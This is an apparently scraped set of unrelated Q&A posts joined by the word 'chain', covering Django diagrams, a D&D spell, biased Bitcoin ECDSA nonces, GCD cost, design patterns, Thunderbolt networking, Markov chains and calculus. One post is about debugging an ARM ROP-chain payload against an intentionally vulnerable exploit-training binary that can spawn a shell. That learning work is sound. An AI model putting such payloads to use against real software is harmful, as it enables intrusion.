## Which diagram to visualise chain of events (in Django)?

Model situation:

In Django (Python web framework), I have a model Event.

I need to visualize this chain of events:

Everytime new Event is created, confirmation email is generated and sent to Event.customer.email and Event.agent.email the Event can be confirmed either by customer or by agent using url inside email. When Event is confirmed, new object Order. When the Order is created, new Invoice object has to be created and sent to customer.

This is a very simple model situation, I need to visualize much more events and relations.

Which diagram would you use and, if possible, how it looks like?

The only thing which comes to my mind is UML sequence diagram but I’m not sure if it’s possible to visualize the whole process. I can’t figure out how to vizualize that CUSTOMER or AGENT can confirm the email etc…

Could you give me a hint? Which diagram should I use?

## Can chain lightning (and perhaps, spells with similar wording) target worn or carried equipment?

Chain lightning can specifically target objects and does not specify that the object must be unattended; spells like fireball or lightning bolt do. Does this mean its secondary targets can be objects worn or carried by the initial target creature? Can the initial target be an object worn or carried by a creature? What about any combination of these?

You create a bolt of lightning that arcs toward a target of your choice that you can see within range. Three bolts then leap from that target to as many as three other targets, each of which must be within 30 feet of the first target. A target can be a creature or an object [no specification unattended or otherwise] and can be targeted by only one of the bolts.

A target must make a Dexterity saving throw. The target takes 10d8 lightning damage on a failed save, or half as much on a successfully one. (PHB p. 221, emphasis mine.)

Dealing 10d8 damage to up to three worn or carried objects after zapping the creature seems to be a really effective way to use this spell; it would probably break things you don’t want your enemy to use and deal him a good chunk of damage. This potential use of the spell, its expected damage output, and the comparatively low HP of objects suggested in the DMG make for a potentially pretty electrifying attack.

Related, though I couldn’t find an answer here.

How does the Chain Lightning spell target?

This one’s accepted answer does address areas of effect, though I think chain lightning is different enough to warrant my question.

What qualifies for the target of a spell?

## What is the origin of insecure 64-bit nonces in signatures in the Bitcoin chain?

In Biased Nonce Sense: Lattice Attacks against Weak ECDSA Signatures in Cryptocurrencies Joachim Breitner and Nadia Heninger use a lattice based algorithm to recover private keys from signatures in the Bitcoin chain that were produced by insecure signers that generated biased nonces.

One large category of insecure signature that they discovered were 5,863 signatures between July 26, 2014 and June 1st, 2015 that were used in multisignature scripts where the nonces were only 64-bits in size. In the paper when a single key was used multiple times to sign multiple messages (which could be multiple inputs on a single transaction) with a small difference between the nonces their algorithm was able to determine the actual nonces used and the private keys with high probability.

Using a small nonce in multiple signatures is just an especially simple case of having a small difference. Small nonces could also be attacked with simpler brute force search approaches without requiring multiple signatures but the paper’s approach was much faster than brute force. Their approach was also able to attack a number of 110 – 160-bit nonces which were used, a range that would have made a brute force search less realistic.

The authors were unaware of the origin of the 64-bit nonces but “hypothesize that this may be a faulty implementation intended for multifactor security, such as a hardware token”.

What do we know about the actual origin of these signatures?

## What is the optimal way to perform GCD chain operation?

Matrix chain multiplication problem:- Given a sequence of matrices, the goal is to find the most efficient way to multiply these matrices. This problem is solved using dynamic programming.

Similarly

GCD chain operation is defined as:- Given a set of $$n$$ integers, what is the most efficient way to find the gcd of all the elements?

The cost is the number of GCD(x,y) invocations done by a binary GCD algorithm.

Basic attempt at solving the problem is:- GCD$$(a_1,a_2,a_3,a_4,\ldots a_n)$$

{

$$k=GCD(a_1,a_2)$$.

if ($$k=1$$)

return 1;

else

return $$GCD(k,a_3,a_4\ldots a_n)$$;

}

In simple terms, it keeps finding the gcd of the smallest two among all the $$n$$ elements and then recurse, by replacing the two elements with their gcd which is at most the smallest element in the input.

Make suitable assumptions if necessary. For example you can assume that the integers are given in sorted order.

Assume GCD is computed using a binary GCD algorithm (other GCD algorithm is also fine) aka

$$GCD(a,b)= GCD(a-b,b)$$

$$GCD(2a,2b)=2GCD(a,b)$$

and $$GCD(a,2b)=GCD(a,b)$$ (if $$a$$ is odd)

GCD(75,25)=GCD(50,25)=GCD(25,25)=25

Number of steps is 3

GCD(125,25)=GCD(100,25)=GCD(50,25)=GCD(25,25)=25

Number of steps is 4

GCD(179,25)= GCD(154,25)=GCD(77,25)=GCD(52,25)=GCD(26,25)=GCD(1,25)=1

Number of steps is 6

A heuristic strategy mentioned in the basic attempt above is not optimal for the following example

GCD(25,75,125,179,181,225)

= GCD(GCD(25,75),125,179,181,225) (3 steps)

=GCD(GCD(25,125),179,181,225) (4 steps)

=GCD(GCD(25,179),181,225) (6 steps)

=1

This required 13 invocations of GCD(x,y) function.

But the optimal strategy would be to see that 179 and 181 have gcd 1 and therefore the solution is 1, which requires computing only 1 bivariate gcd.

GCD(179,181)=GCD(179,2)=GCD(179,1)=1

which takes 3 invocations of GCD(x,y) only

I am not sure if there exists an optimal way to do it, or maybe it is NP hard to find a solution which makes the least number of GCD(x,y) calls.

## Deleting a list of dependent OPbject using chain of Responsibility design pattern

my requirement is i want to delete a Object A

A-> B-> C-

here if you want to delete A you have to delete B which is dependent on B , then If you Want to Delete B you Have to Delete C which is dependent on B and The Chain goes like this

i’m planning to Solve it using chain of responsibility design pattern , or is there any design patterns or principles that fit this scenario

## Is it a bad idea to daisy chain to an internet router through an external drive?

I’m interested in setting up a wired connection to my router, in order to achieve a faster internet connection than I can get from built-in 802.11n. My 2012 Mac Book Air has only one Thunderbolt 1 port, and that port is in use by an external LaCie HD with two Thunderbolt ports. So I would be connecting to the internet this way:

2012 MacBook Air > Thunderbolt 1 Cable > Lacie HD >  Apple Thunderbolt to Gigabit Ethernet Adapter >  Fast Cat5E UTP Patch Cable >  Netgear Router > cable modem 

Will having a hard drive between a laptop and its internet connection impose a significant performance cost?

## How to show & change different states of a system for supply chain

Two ways I can think of in regards to supply chain is a drop down showing order status such as not started, processed shipped. Or a slider like mechanism showing progress towards the end similar to how shipping sites do it.

Are there any other ways to do this and any best practices to consider?

States would be not started, in the process, shipped, arrived, canceled.

The drop-down you wouldn’t be able to see all of them at the same time so I think that is less desirable, however, if you need to manually change the state that may be preferred.

The current design is below. I Think it is redundant to have both but If the user can change the status I am not sure I like the slider with notches over the drop down.

## ARM: ROP chain: Stack overflow fails on specific address

I am trying to exploit a slightly modified roplevel3 from Billy Ellis’ Exploit-Challenges. However, overflowing the stack does not work using the address of the global variable internal_mode (0x00020b44).

This is my ROP chain:

python2 -c "import struct; print('A'*20 + struct.pack('<l', int('00010700', 16)) + 'F'*4 + struct.pack('<l', int('00020b44', 16)) + struct.pack('<l', int('000106f4', 16)) + struct.pack('<l', int('00010708', 16)) + struct.pack('<l', int('00010708', 16)))" > input 

I finally run the program in GDB:

(gdb) disassemble gadget  Dump of assembler code for function gadget: => 0x00010700 <+0>: pop {r0, r1, pc}    0x00010704 <+4>: bx  lr End of assembler dump.  (gdb) disassemble write_anywhere  Dump of assembler code for function write_anywhere:    0x000106f4 <+0>: str r0, [r1]    0x000106f8 <+4>: pop {r7, pc}    0x000106fc <+8>: bx  lr End of assembler dump.  (gdb) x/1xw 0x20b44 0x20b44 <internal_mode>:    0x00000000  (gdb) b *gadget  Breakpoint 1 at 0x10700  (gdb) run < input  Starting program: /home/pi/secstock/tutorials/beginners_guide_to_exploitation_on_arm/06/roplevel3 < input Welcome to ROPLevel3 by @bellis1000  Select an option: [1] Function [2] Function (internal) [3] Exit Invalid choice.  Breakpoint 1, 0x00010700 in gadget () 

Looking at the stack shows that the address of internal_mode (0x00020b44) did’t reach the stack:

(gdb) x/20xw $sp-8 0xbefff198: 0x41414141 0x00010700 0x46464646 0xbeff0044 0xbefff1a8: 0x00000001 0x00010708 0xb6ffe0c8 0xb6ffddd0 0xbefff1b8: 0x00000000 0x00000000 0x00010418 0x00000000 0xbefff1c8: 0x00000000 0x00000000 0xb6ffc000 0x00000000 0xbefff1d8: 0x5eaf5113 0x56b822e3 0x00000000 0x00000000  Overflowing the stack works correctly if I change the address 0x00020b44 in my attack string to e.g. 0x00021b44. The new attack string: python2 -c "import struct; print('A'*20 + struct.pack('<l', int('00010700', 16)) + 'F'*4 + struct.pack('<l', int('00021b44', 16)) + struct.pack('<l', int('000106f4', 16)) + struct.pack('<l', int('00010708', 16)) + struct.pack('<l', int('00010708', 16)))" > input  The behavior in GDB: (gdb) run < input The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/pi/secstock/tutorials/beginners_guide_to_exploitation_on_arm/06/roplevel3 < input Welcome to ROPLevel3 by @bellis1000 Select an option: [1] Function [2] Function (internal) [3] Exit Invalid choice. Breakpoint 1, 0x00010700 in gadget () (gdb) x/20xw$  sp-8 0xbefff198: 0x41414141  0x00010700  0x46464646  0x00021b44 0xbefff1a8: 0x000106f4  0x00010708  0x00010708  0xb6ffdd00 0xbefff1b8: 0x00000000  0x00000000  0x00010418  0x00000000 0xbefff1c8: 0x00000000  0x00000000  0xb6ffc000  0x00000000 0xbefff1d8: 0xbcec0b6c  0xb4fb789c  0x00000000  0x00000000 

The roplevel3.c source code:

#import <stdio.h> #import <string.h> #import <unistd.h> #import <stdlib.h>  volatile int dummy1 = 0; volatile int dummy2 = 0; volatile int dummy3 = 0; volatile int dummy4 = 0; volatile int dummy5 = 0; volatile int dummy6 = 0; volatile int dummy7 = 0; int internal_mode = 0;  void func() {         printf("Hello world! Welcome to a function - an function that does absolutely nothing!\n"); }  void func_internal() {      printf("\x1b[33mWelcome to a more interesting function with developer-only functionality ;P\x1b[0m\nWhat would you like to do?\n[1] Touch a file\n[2] Spawn a shell\n[3] Quit function\n");      char input[1];     scanf("%s",input);      if (strcmp(input,"1") == 0) {             system("touch /created_by_roplevel3");     } else if (strcmp(input,"2") == 0) {             system("/bin/sh");     } else if (strcmp(input,"3") == 0) {      } else {             printf("Invalid option");     }  }  void validate(char func_id[]) { if (strcmp(func_id, "1") == 0) {             func(); } else if (strcmp(func_id,"2") == 0) {             if (internal_mode == 0) {                     printf("You do not have permission to launch this function.\n");     } else {                 func_internal();             }     } else if (strcmp(func_id,"3") == 0) {     exit(0); } else {         printf("Invalid choice.\n"); } }  void write_anywhere() {     __asm__("str r0, [r1]"); __asm__("pop {r7, pc}"); }  void gadget() {     __asm__("pop {r0,r1,pc}"); }  int main(){ int a = 1;  printf("Welcome to ROPLevel3 by @bellis1000\n\n");  while (a == 1) {     printf("Select an option:\n[1] Function\n[2] Function (internal)\n[3] Exit\n");          char input[8];     scanf("%s", input);              validate(input); }      return 0; } 

I am compiling the code as follows:

clang -c -fno-pie -fno-stack-protector -mno-thumb roplevel3.c clang -o roplevel3 roplevel3.o 

# Environment

## Host

• qemu-arm version 3.1.0

## Target (arm-unknown-linux-gnueabihf)

• Raspbian GNU/Linux 8 (jessie)
• Linux raspberrypi 4.4.34+ #3 Thu Dec 1 14:44:23 IST 2016 armv6l GNU/Linux
• Raspbian clang version 3.5.0-10+rpi1 (tags/RELEASE_350/final) (based on LLVM 3.5.0)

## When is a Markov chain ergodic?

Let

• $$(\Omega,\mathcal A,\operatorname P)$$ be a probability space
• $$(E,\mathcal E)$$ be a measurable space
• $$(X_n)_{n\in\mathbb N_0}$$ be an $$(E,\mathcal E)$$-valued time-homogeneous Markov chain on $$(\Omega,\mathcal A,\operatorname P)$$ with transition kernel $$\kappa$$
• $$\mu$$ denote the distribution of $$X_0$$ under $$\operatorname P$$

Assume that there is a Markov kernel $$\pi$$ with source $$(E,\mathcal E)$$ and target $$\left(E^{\mathbb N_0},\mathcal E^{\otimes\mathbb N_0}\right)$$ with $$\operatorname P\left[X\in B\mid X_0\right]=\pi(X_0,B)\;\;\;\text{almost surely for all }B\in\mathcal E^{\otimes\mathbb N_0}\tag1.$$ Now, let $$\tau:E^{\mathbb N_0}\to E^{\mathbb N_0}\;,\;\;\;(x_n)_{n\in\mathbb N_0}\mapsto(x_{n+1})_{n\in\mathbb N_0}$$ and $$\operatorname P_\mu:=\mu\pi$$ denote the composition of $$\mu$$ and $$\pi$$, i.e. $$\operatorname P_\mu[B]=\int\mu({\rm d}x_0)\pi(x_0,B)\;\;\;\text{for all }(x_0,B)\in E\times\mathcal E^{\otimes\mathbb N_0}\tag2.$$

Note that

1. $$(X_n)_{n\in\mathbb N_0}$$ is stationary
2. $$\mu$$ is invariant with respect to $$\kappa$$
3. $$\tau$$ is $$\operatorname P_\mu$$-preserving, i.e. the distribution of $$\tau$$ under $$\operatorname P$$ is $$\operatorname P$$

are equivalent. Assume that one (and hence all) of these conditions hold.

We say that $$\operatorname P_\mu$$ is $$\tau$$-ergodic, if $$\mathcal I:=\left\{B\in\mathcal E^{\otimes I}:\tau^{-1}(B)=B\right\}$$ is $$\operatorname P_\mu$$-trivial (each event has $$\operatorname P_\mu$$-measure $$0$$ or $$1$$). Are there more easy to verify conditions that ensure that $$\operatorname P_\mu$$ is $$\tau$$-ergodic?

## Chain rule for a function

I have a question about fundamental calculous.

Let $$d$$ be an integer and denote points in $$\mathbb{R}^ {1+d}$$ by $$(x,z)$$. Let $$\rho=|x|_1$$ and $$r=|z|_d$$. Here, $$|\cdot|_i$$ denotes the Euclid norm on $$\mathbb{R}^i$$, $$i=1,d$$.

Let $$u$$ be a smooth function of $$\rho$$ and $$r$$.

Question

Let $$H$$ be a positive smooth function on $$[0,\infty)$$. We assume \begin{align*} -\frac{H'(s)}{2H(s)}r^2+s+\frac{H(s)H'(s)}{2} \end{align*} is nonnegative and increasing in $$s$$ for fixed $$r \in [0, H(s)]$$.

I want to find the gradient of the following function: \begin{align*} (0,\infty) \times \mathbb{R}^d \ni (x,z) \mapsto u\left(-\frac{H'(x)}{2H(x)}|z|_d^2+x+\frac{H(x)H'(x)}{2},|z|_d \right),\quad |z|_d \le H(x). \end{align*}

My attempt

Let $$\phi(x,z)=-\frac{H'(x)}{2H(x)}|z|_d^2+x+\frac{H(x)H'(x)}{2}$$ and let $$\psi(z)=|z|_d$$. Then, \begin{align*} \frac{\partial u}{\partial x}&=u_{\phi}\frac{\partial \phi}{\partial x_1}=u_{\phi} \left\{ -\frac{H”(x)H(x)-H'(x)^2}{2H(x)^2}|z|_d^2+1+\frac{H'(x)^2+H(x)H”(x)}{2}\right\},\ \frac{\partial u}{\partial z_i}&=u_{\phi}\frac{\partial \phi}{\partial z_i}+u_{\psi}\frac{\partial \psi}{\partial z_i}=-\frac{u_{\phi}H'(x)}{H(x)}z_i+u_{\psi}\frac{z_i}{|z|_d}. \end{align*} Here, $$z=(z_1,\ldots,z_d) \in \mathbb{R}^d$$.

Is the above calculation valid?